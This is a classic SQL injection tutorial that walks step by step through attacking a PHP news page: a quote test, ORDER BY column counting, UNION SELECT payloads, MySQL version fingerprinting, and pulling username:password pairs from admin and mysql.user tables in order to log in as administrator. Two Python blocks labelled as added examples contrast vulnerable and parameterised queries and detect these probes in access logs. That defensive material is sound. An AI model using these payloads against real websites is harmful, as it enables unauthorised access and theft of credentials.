Classic SQL Injection Tutorial
————————————————
First of all, check for the vulnerability.
http://www.example.com/news.php?id=1
Now, to test whether it is vulnerable, we add a ' (single quote) to the end of the URL, which gives http://example.com/news.php?id=1'
So if we get an error on that page like this:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar,
that means it is vulnerable to SQL injection.
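To see why the quote test produces that error and what the fix looks like on the application side, here is an added example (not from the original tutorial): a toy news lookup built the vulnerable way and the hardened way, on an in-memory SQLite table that is constructed here and stands in for the MySQL database behind news.php. The table, rows and function names are assumptions.

```python
"""Added example (not part of the original tutorial): the same id lookup
written with string concatenation and with a bound parameter, on an
in-memory SQLite table constructed here to stand in for the MySQL backend."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build an in-memory database with a constructed news table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(1, "First post", "hello"), (2, "Second post", "world")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, raw_id: str):
    """The pattern the tutorial relies on: the raw id is glued into the SQL text.
    Returns ('ok', rows) or ('error', message); the message is what a page
    that echoes database errors would show to the visitor."""
    sql = "SELECT title, body FROM news WHERE id = " + raw_id
    try:
        return "ok", conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        return "error", str(exc)


def lookup_safe(conn: sqlite3.Connection, raw_id: str):
    """Hardened form: check the type first, then bind the value as a parameter.
    The input never becomes part of the SQL text, so a quote, an ORDER BY or a
    UNION is just a value that is rejected or matches no row."""
    try:
        news_id = int(raw_id)  # id must be an integer; anything else is refused
    except ValueError:
        return "ok", []
    rows = conn.execute("SELECT title, body FROM news WHERE id = ?", (news_id,)).fetchall()
    return "ok", rows


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1'", "1 union all select 1,2"):
        print(repr(probe), "vulnerable:", lookup_vulnerable(db, probe))
        print(repr(probe), "safe:      ", lookup_safe(db, probe))
```

The vulnerable version hands the raw id to the database, so a stray quote becomes a syntax error that the page echoes back and a UNION appends rows the query never intended to return; the hardened version rejects non-integer ids and binds the value as a parameter, so the same inputs simply match nothing.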
Now we need to find the number of columns.
To find the number of columns we use the ORDER BY statement (it tells the database how to order the result).
We just keep incrementing the number until we get an error.
http://www.example.com/news.php?id=1 order by 1/* <-- no error
http://www.example.com/news.php?id=1 order by 2/* <-- no error
http://www.example.com/news.php?id=1 order by 3/* <-- no error
http://www.example.com/news.php?id=1 order by 4/* <-- error (we get a message like this: Unknown column '4' in 'order clause', or something like that)
That means it has 3 columns, because we got an error on 4.
Now let's check the UNION function.
What can we do with UNION?
With UNION we can select more data in one SQL statement.
So let's start:
http://www.example.com/news.php?id=1 union all select 1,2,3/* (we already found the number of columns)
So if you see some numbers on the screen, for example 1 or 2 or 3 or 4 etc., then congrats, the UNION works.
Now we need to check the MySQL version.
Let's do it fast, baby.
http://www.example.com/news.php?id=1 union all select 1,2,3/* NOTE: if /* doesn't work or you get some error, then try with -- (two dashes followed by a space) instead;
it's important for our query to work properly.
Let's say we have the number 3 on the screen; now we need to check the MySQL version.
Let's do it.
We replace the number 3 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar.
So it should look like this: http://www.example.com/news.php?id=1 union all select 1,@@version,3/*
So if you get an error like this: "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
then we need the convert() function.
Okay, let's try:
http://www.example.com/news.php?id=1 union all select 1,convert(@@version using latin1),3/*
Or let's try with hex() and unhex():
http://www.example.com/news.php?id=1 union all select 1,unhex(hex(@@version)),3/*
and then we will get the MySQL version.
Now we need to get the table and the column names.
So if the MySQL version is, for example, 4.1.33 or 4.1.12,
we must guess the table and column names in most cases.
Common table names are: user/s, admin/s, member/s ...
Common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc.
It would look like this:
http://www.example.com/news.php?id=1 union all select 1,2,3 from admin/* (if we see the number 3 on the screen like before, that's very good.)
So we know that the table admin exists.
So now we need to check column names; let's do it.
http://www.example.com/news.php?id=1 union all select 1,username,3 from admin/* (if you get an error, then you need to try another column name)
We will get a username displayed on screen, for example admin, or something else.
Now we need to check if the column password exists.
http://www.example.com/news.php?id=1 union all select 1,password,3 from admin/* (if you get an error, then try another column name)
Now we see the password on the screen, as a hash or in plain text; it depends on how the database is set up xD
The hash could be an MD5 hash, a MySQL hash, etc.
Now let's tidy up the query so the output is easier to read.
To do that, we can use the concat() function (it joins strings).
Example:
http://www.example.com/news.php?id=1 union all select 1,concat(username,0x3a,password),3 from admin/*
Note: 0x3a is the hex value for the colon character (:).
There is another way of doing that, for example char(58), the ASCII value for the colon:
http://www.example.com/news.php?id=1 union all select 1,concat(username,char(58),password),3 from admin/*
Now we will get username:password displayed on screen, for example admin:hash or admin:password.
Once you have this, you can log in as the website admin or website super administrator.
If you can't guess the table name right, you can always try mysql.user (the default).
It has user and password columns, so the example would be like this:
http://www.example.com/news.php?id=1 union all select 1,concat(user,0x3a,password),3 from mysql.user/*
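From the defender's side, every step above leaves a recognisable trace in the web server's access log: the trailing quote, the climbing ORDER BY numbers, the UNION SELECT with @@version, the concat with 0x3a and the mysql.user lookup. The following added example (not part of the original tutorial) scans constructed log lines in a common combined-log shape for exactly those probe patterns; the log format, sample lines, rule names and thresholds are assumptions.

```python
"""Added example (not part of the original tutorial): a small detector for
the probe patterns this tutorial walks through, run over constructed
access-log lines.  Log layout, sample lines and rule names are assumptions."""
import re
from urllib.parse import unquote_plus

# Each rule is named after the tutorial step it corresponds to.  Patterns are
# applied to the URL-decoded, lower-cased query string of each request.
RULES = [
    ("quote-probe",      re.compile(r"=\s*\d+\s*'")),                      # id=1'
    ("order-by-probe",   re.compile(r"\border\s+by\s+\d+")),               # column counting
    ("union-select",     re.compile(r"\bunion\s+(all\s+)?select\b")),      # union injection
    ("version-probe",    re.compile(r"@@version|\bversion\s*\(")),         # fingerprinting
    ("hex-concat",       re.compile(r"\bconcat\s*\(.*0x3a|char\s*\(58\)")),  # user:pass join
    ("mysql-user-table", re.compile(r"\bmysql\.user\b")),                  # default table
    ("comment-tail",     re.compile(r"/\*\s*$|--\s*$")),                   # /* or -- at the end
]

# Constructed sample lines (not real traffic) in a combined-log-like shape.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /news.php?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /news.php?id=1%27 HTTP/1.1" 500 233
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /news.php?id=1%20order%20by%204/* HTTP/1.1" 500 233
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /news.php?id=1%20union%20all%20select%201,@@version,3/* HTTP/1.1" 200 540
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /news.php?id=1+union+all+select+1,concat(username,0x3a,password),3+from+admin/* HTTP/1.1" 200 560
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=order+form HTTP/1.1" 200 900
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(line: str):
    """Return (ip, path, [matched rule names]) for one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path = m.group("path")
    query = path.split("?", 1)[1] if "?" in path else ""
    decoded = unquote_plus(query).lower()  # %27 -> ', + -> space, then normalise case
    hits = [name for name, rx in RULES if rx.search(decoded)]
    return m.group("ip"), path, hits


def scan(log_text: str):
    """Return one finding per line that matched at least one rule."""
    findings = []
    for line in log_text.splitlines():
        result = classify(line)
        if result and result[2]:
            ip, path, hits = result
            findings.append({"ip": ip, "path": path, "rules": hits})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], ",".join(f["rules"]), f["path"])
```

Decoding the query string before matching matters: the same probe arrives as `%27`, `%20` and `+` in different requests, and a raw-string match on any one encoding misses the others. The benign `search.php?q=order+form` line shows why the ORDER BY rule insists on a number after `by`; in production, pair these rules with a per-IP count over a short window, since the tutorial's one-request-at-a-time method produces a burst from a single source.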
The End.